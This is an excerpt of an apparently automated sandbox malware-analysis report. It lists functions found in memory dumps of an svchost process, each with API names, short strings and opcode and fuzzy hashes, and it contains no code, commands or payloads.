                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 968b9330f179ee5e314775584756f230334fc7093088daeda48f812371d2e503
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: DD110DB060E28E41FA68A72AD6D23FA63435B847E0F5C4235982B467FADB2C85029710
                                                        Function 000001FB539C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: caca88eb4ff424c5bfd08270abe60720f522a2b93f121c2b0dd3a671aa919aca
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 60817BF960A64BCEFB50AB69E4D13F96392AB89780F5C44359A07C77B6DB3CC8458700
                                                        Function 000001FB539C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 76704e09874f35ba00da39aab094292295e922183a9bda5e610428fd81b52da4
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: BA31C0B121BA46A1EE22DB42E880BF56396B758BA0F5D09359D2F0B7A1EF3CC5558300
                                                        Function 000001FB539D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: f19f250884e5a5ca10a7d28f396b53d68425f9b958b93f700f72ddf209fe23ad
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: F2116072319B8286F7508B56F88536967A1F788FE5F484634EA5B877A4CF7CC8148740
                                                        Function 000001FB539C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5c0b12d5fc8e251d62a9ecb423148d3d6f5980d317266ae4fff7775e2e87b1f2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 8B115E7670AB8682FF549B66F4842B963A2F748B85F4C0439DE8A077A4EF3DC505C704
                                                        Function 000001FB539C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 5469abee5b4e9bf0bdf770da9b99d52bae9361e8749dbde8dcbd5f420d2bc2f2
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 17D17D76209B4985EB709B16E4D43AA77A1F3C8B84F580126EACE47BB5DF3CC551CB40
                                                        Function 000001FB539C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: cc9ad914701f13315fd69f315d2c8feb691bd09a9d7ccb6b0530ae7b9a7b48cd
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: C131837670AB5A82FA15DF56D5C07BAA792FB44B84F0C44309E8A47B65EF3CC4A18740
                                                        Function 000001FB539CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 8e2cc52478816b46073d1eda117981dfc24803c2b807f92ef055f03951766850
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 4A115EB020F28A81FA64A726D6C63BD63435B887F0F5C4734A837467FADF6C84029710
                                                        Function 000001FB539C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: d96a0d85e18bd00034df92b739627b984554b744396f702b8ef2f930aa75394b
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 67016D71309A8682FB14DB52E4883AA63A2F788BC0F8C4435DE8A43765DF3CC549C700
                                                        Function 000001FB539C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: fda331bf91d84a1e7dd7c21d20511b9b3e708f0354f79a4ceedf790b70eea54f
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 650121B521A74682FB249B56F8893A563A2BB49B85F4C4834CD4A07774EF3DC1448B00
                                                        Function 000001FB539C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 170696c3728ef68149a4f5dd5ab44c4829b88e797df50feb444b0b5984898a95
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 4551BFB270A24B8AEB14CB15E489BBA3797F344B88F5D8534DA07477A8EB39C841C704
                                                        Function 000001FB539C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: a804f7a027a439150108e4f724fee75847e24b7a128904c366b285a41af1a838
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: DD31D1B220A686C6E714DF12E8897AA77A6F344B88F4D8434EE47477A9DB3DC941C704
                                                        Function 000001FB539C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 7041c7b363bb532df87a82727498a3c47e6c77f4aba70d1cec084aacf5478d1c
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BCF044B230968692F7608F21F8C47A96762F748BC8FCC4030DA4A46A64DF3CC64DCB04
                                                        Function 000001FB539C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 3d718759b31359e7105f5c9c5d76d0a703cea5687920891f1199a65a2e33e12e
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 50F0F8B561ABC682FA148B52F9951A9A762AB48FD0F4C9530EE4B47B28DF2CC4458700
                                                        Function 000001FB539CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 02050852133c47cbee4d85a20b7f67a6a3ee0c205252fbf7605758d57af0b57c
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 64F062B521A64681FB108F29E4853B96322EB85761F9C0A39CA6B453F4DF3CC444C340
                                                        Function 000001FB539C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 53032330eb2a6da8034d978688d882b7e120780e33b779c8a0d6604ede2127e4
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: E002CB7221EB8586E760CB56F4947AAB7A1F3C4794F184025EACE87BA9DF7CC454CB00
                                                        Function 000001FB539C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 35d6f73adecf76b2e3ecaee93454b03218b5995e470e293602ffafe4bc405b43
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: DE61BDB651EB49C6E760CB16E49436AB7A2F388794F581125EA8F47BB8DB7CC540CF00
                                                        Function 000001FB539A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 5d1ff030d00cd2d713d849fa80cc5a6bdae8e42945106595b2b3d385686a6c18
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: CC1191B2A1EB1311FAA615ECE4D53F911D36B58374F4C9738AD6B06FF68B2CC8415500
                                                        Function 000001FB539D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: f9a8c0488bc3d4deea02a29900cc9a1534e547037d25a2bef2725409dacae6a9
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: E8118FF6A1AA9321FA64556AD4D73F612536B783E8E0C0E34A9770E7F6CF2CC8614601
                                                        Function 000001FB5399F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: f68e625ba7acd24a59fe08d2c251c553b64a170b309e681ffe222c22834a18b8
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 9661A1F360E24242FA698B64D4E03FEA7A3E745742F5D4535CA1B177B4DB3CC8458A60
                                                        Function 000001FB539CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: bedfb9b5bf910b629efd52c6bf81bea48cf952128bd26ee9357b23212e3a9e3e
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 27614C7261AB898AE710DF65D4803ED77A2F348B88F084225EF4A17BA9DB3CD555C701
                                                        Function 000001FB5399A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e67ae822c152f91a8f128c44beafeeb84265359930fac9f4cc8cbbf4076c63b1
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: B8519FB3109282CAEB748B15D4A43AD77A2F359B94F1C5125DA9A87BA5CB3CD460CF02
                                                        Function 000001FB539CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: dab5994280bf0e8b86b40aef4342addec26e55d86bcc80a1a6ecae4785b560e1
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 1051C0B212938A8AEB748F15D5C43B977A2F755B94F1C4135DA8A47BE5CB3CC450C702
                                                        Function 000001FB53998405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: c962e0a8b14c83a09ed27bc9a3309a2cbfdf0f654e531ad194cbd062dad2bbc8
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 7851A0B371E2028BEB56CB15D494BE8379AF354B98F588178DA07477A8EB38CC45CB05
                                                        Function 000001FB539983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 608a93562e2c18e35ab68ab54ccf2d1a6f83fad5714ed2d3758c5d6ebae4ab62
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 1431BEB321E641D6E712DF11E8947E937AAF740B88F088128EE4B077A8CB3CC940CB05
                                                        Function 000001FB539D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 70b94840535153a2c256647204e39846594304de18c1bbc617468f21897222c2
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: D0D105B271AA8189F711CF75D4803EC7BB2F754798F188625CE9A97BA9DB38C406C340
                                                        Function 000001FB539C14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: bdc4653b437380b3f3f4ca15b24486875ab127c3d64caf90ce25882780f20bf3
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 0901807260AAD6D6E704DF62E8851AA67A2F749FC1F484834DA8A43725DF38C051C740
                                                        Function 000001FB539D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 40f7c5f63300661cd661e55aa19decf58a802a22f31068c6dfd4796ed8c75239
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D291E4B270A65285F7609F65D4C23FDABA2B705B88F1C4529DE8B577A4DB7DC842C300
                                                        Function 000001FB539C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
